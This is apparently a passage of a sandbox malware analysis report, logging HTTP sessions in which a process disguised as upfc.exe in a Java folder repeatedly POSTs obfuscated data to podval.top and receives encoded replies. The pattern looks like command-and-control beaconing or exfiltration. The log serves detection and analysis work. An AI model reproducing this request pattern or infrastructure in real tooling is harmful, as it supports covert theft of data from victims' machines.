                                                    Data Ascii: ZWZ_[YW]XVUQP\YSUY^]QUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[')?0?]'V+\)&#!Y:>5]$%-0?U->74T+,"['$Y 1
                                                    Jul 3, 2024 16:43:28.948498964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.314923048 CEST | 577 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kIBkqq5Rb%2B87029gidNh6w%2BneUzzX1%2F4dC2fU8xzHRFRpbrCA5fCJvRj2DEUqbdQPI0Ykoth4OYQ6cbQwYHVwk7Nw2dCn7Jk3xype0S5xKa1YDS8Nf8kd%2Bra4OyZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e9a9f77d0b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:29.401619911 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    104 | 192.168.2.10 | 49822 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:29.543776989 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:29.902895927 CEST | 1060 | OUT | Data Raw: 5f 53 5f 55 5b 56 52 5b 58 56 55 51 50 51 59 50 55 51 5e 5b 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_U[VR[XVUQPQYPUQ^[QTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&:;':+_'+^>X27),==]$6%'#;7X7<[;"['$Y
                                                    Jul 3, 2024 16:43:30.262739897 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:30.264024973 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9NvvmDIYTvJhkYMvdqL31Q1b9QSrgmYmHnRefhMmRI0j4ccztB3%2BF0UwBKIRLXqlRG8gMG1FLel3shmlQ%2FQLpjs08V4OBa3Y9hN6fs8xAoLKy3kd3Cdc8KRGfYF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f0284242da-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:43:30.264036894 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9NvvmDIYTvJhkYMvdqL31Q1b9QSrgmYmHnRefhMmRI0j4ccztB3%2BF0UwBKIRLXqlRG8gMG1FLel3shmlQ%2FQLpjs08V4OBa3Y9hN6fs8xAoLKy3kd3Cdc8KRGfYF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f0284242da-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    105 | 192.168.2.10 | 49823 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:30.392620087 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:30.744587898 CEST | 1060 | OUT | Data Raw: 5a 57 5f 5b 5b 5f 57 59 58 56 55 51 50 5f 59 56 55 5a 5e 5d 51 5c 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZW_[[_WYXVUQP_YVUZ^]Q\S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]%_$':<3;](=67=>.>.&&)Z$ <,X'X4T$^,"['$Y =
                                                    Jul 3, 2024 16:43:30.886224031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.086936951 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ic8VmuOrWkGu5IwXMiEezyNdGPQriJTdANNObT2%2FpgbHdxbuAVlX4Pj1tmZM6HJ3qHYOEE1sGOStQZVbO%2Ffn8tlfBq1Mh2%2BqrNihIKTflEIwMQ%2BmgW%2BVo783adWR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f5a8ab3338-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    106 | 192.168.2.10 | 49824 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:31.218077898 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:31.575375080 CEST | 1060 | OUT | Data Raw: 5f 57 5f 55 5b 56 57 59 58 56 55 51 50 5f 59 53 55 50 5e 5c 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_U[VWYXVUQP_YSUP^\QUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&9 &)^03#\>X27[!,>5Z&%\3 8; 2(Z,<"['$Y =
                                                    Jul 3, 2024 16:43:31.670202971 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.878946066 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EpIMDv4QUfJMOgMwRzq%2FycOVSsm2q8DxqEHCCBxAFIcBF0d%2FysHYuPiYmxlpsyeQc6gCxq1Z2bmGB3higVpBYup6PhumW7Hf3DE92iEhQwXjFqZ%2Bvphrzyz%2Bj1Gg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5faadc48ccc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    107 | 192.168.2.10 | 49825 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:32.020035028 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:32.369653940 CEST | 1060 | OUT | Data Raw: 5a 50 5a 5f 5b 57 52 5b 58 56 55 51 50 5e 59 56 55 5b 5e 5a 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ_[WR[XVUQP^YVU[^ZQXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1A390'*&72:=!&%5'U 8> 20-,"['$Y
                                                    Jul 3, 2024 16:43:32.489301920 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:32.667859077 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7duWWZh072qj2pOUp01cjaVAhgNGE8lcq8TB7zy%2Bdiy5XPgkN%2FDtnNWs34NLRlXmtQU1TvQEQi635YkCehse5VOn6kp9YiUsQ%2Fon3ctDpZTHuQUI%2BDz%2Fo9lBueY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5ffa9417ced-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    108 | 192.168.2.10 | 49826 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:32.858467102 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:33.213408947 CEST | 1060 | OUT | Data Raw: 5a 56 5f 5f 5e 5d 57 5a 58 56 55 51 50 5a 59 57 55 5e 5e 59 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV__^]WZXVUQPZYWU^^YQTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&C&*#_3V7^).)#!\:X5\&5!X$#T/'"!</,"['$Y )
                                                    Jul 3, 2024 16:43:33.313642025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:33.642043114 CEST | 588 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YBuYWfRopfs5vv%2B7q8uDTG57Dw7%2Fq0ISDBt%2BVngwPUIy4x8eYj09um756El1xB%2BX9cBhs7n%2Bxz2O2G6sEA9WnaQOFaqz9nsRWU%2FHa950TC2xIlm6KFH8f%2F9xh1h6"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a604ea291996-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    109 | 192.168.2.10 | 49827 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:33.808743000 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.166680098 CEST | 1060 | OUT | Data Raw: 5f 53 5f 5c 5b 5b 52 5a 58 56 55 51 50 5b 59 5b 55 58 5e 5e 51 55 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_\[[RZXVUQP[Y[UX^^QUSZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&:<3/X'0+(>4":-Y'&=Z3U+V-., 2 Y,,"['$Y -


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    110 | 192.168.2.10 | 49828 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:34.198561907 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.557533026 CEST | 1748 | OUT | Data Raw: 5f 57 5a 5b 5e 5c 52 5d 58 56 55 51 50 5f 59 50 55 5b 5e 5e 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ[^\R]XVUQP_YPU[^^QYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2);'9#^3<>1S!=%Y,>:0C9'?S/X;^"17,"['$Y =
                                                    Jul 3, 2024 16:43:34.635180950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:34.978106976 CEST | 731 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNAjqgcsk%2FQPxVjjrVhdGiUpFQj52ifw8DHotfGZ9WXr6pg8Oz%2BoT50GgPjWogXSn9JPGCg99oj1OFVAOGT1WGy7kIPOBWBwXS8jhApL3BXny%2Ft1FOmjUxSpGTHm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a60d3e857ce4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 26 2a 2d 5c 31 21 30 09 2d 2e 27 1b 3f 04 24 15 3b 3a 26 06 28 24 25 13 2c 2d 32 18 34 03 35 07 3c 05 28 16 25 1e 0e 54 35 31 20 5b 04 1c 20 04 3e 3a 21 5b 3f 16 20 0d 26 3c 22 19 25 24 22 02 27 05 29 0a 27 38 2f 12 3c 5e 35 55 26 31 30 05 2b 28 08 5a 2a 34 36 1d 35 24 21 54 02 13 22 1c 30 2d 35 54 34 20 2c 0c 27 30 21 14 30 42 27 18 30 0a 2e 56 28 23 22 10 30 08 3c 11 21 3f 2c 0e 27 06 32 5d 33 03 2a 01 36 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&*-\1!0-.'?$;:&($%,-245<(%T51 [ >:![? &<"%$"')'8/<^5U&10+(Z*465$!T"0-5T4 ,'0!0B'0.V(#"0<!?,'2]3*6(#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    111 | 192.168.2.10 | 49829 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:34.422549009 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.776151896 CEST | 1060 | OUT | Data Raw: 5a 55 5a 5f 5b 5a 57 5c 58 56 55 51 50 5d 59 52 55 59 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ_[ZW\XVUQP]YRUY^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%98$* 'V#_=-!=[9.9Z$9%3;X;X"1 8<"['$Y 5
                                                    Jul 3, 2024 16:43:34.873919010 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.221559048 CEST | 590 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKgT331b2%2BsfPzi2MoMK0PjkZ5DDdPycmOsaKpcg6H%2F%2FEvLqI4UAxU6y%2FXc%2FjO6%2Fz8geLS2DiXVxei0rCybltSmkMRUzBj5QMrb%2BXBMDzIi%2B7dcYrtowuqIUZX0T"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a60eaf9f8c35-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    112 | 192.168.2.10 | 49830 | 188.114.97.3 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:34.748697996 CEST | 293 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:35.111377001 CEST | 344 | OUT | Data Raw: 00 00 04 04 06 0c 01 02 05 06 02 01 02 00 01 04 00 0b 05 0c 02 04 03 0d 01 02 0e 05 05 01 02 07 0a 02 06 0e 03 04 05 01 0d 00 05 0b 04 07 05 51 06 50 0f 0e 0e 57 04 0a 05 04 04 07 01 02 07 5b 03 53 0c 0c 05 06 01 07 0e 55 0c 50 0d 06 0f 01 05 50
                                                    Data Ascii: QPW[SUPPYR\L~|`bOvbuLa\kQ~|}O`Bl]ZJxR{Eo`WZS]Rww{Zj_~V@{CP}re
                                                    Jul 3, 2024 16:43:35.223052025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.641561985 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9VqPxcgwDEo5%2FkjDlthJigMWirj1Yhs6rJB7AlHql775Tlxoi7%2BIBy%2BqrkgBKpqQ%2BUhVLr1VfvKzeMEirD1E0m%2BvOnlK3ruTJ85p9q1h%2BLvE%2FbFnOolCysfPKmn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a610db7242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:35.669821024 CEST | 269 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:35.773369074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.773624897 CEST | 384 | OUT | Data Raw: 5a 52 5f 58 5b 59 57 5e 58 56 55 51 50 5c 59 52 55 5e 5e 5b 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_X[YW^XVUQP\YRU^^[QZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29C0']'V'*-1S4=,-%$.'#4;<71#8<"['$Y 1
                                                    Jul 3, 2024 16:43:36.067106962 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEmJ5IERZN0BbZKT37E5Sld93JfBCvnOe%2FirEyADNZ9gfFMYuDAhaS9Yq%2BPDUkmmKVwCi8oiaFgdt3y21AWtPbdHo6pFTjeKn9yogeJTK2awhHZOvU9hTO4fP1iw"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6144f1642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:36.104398012 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
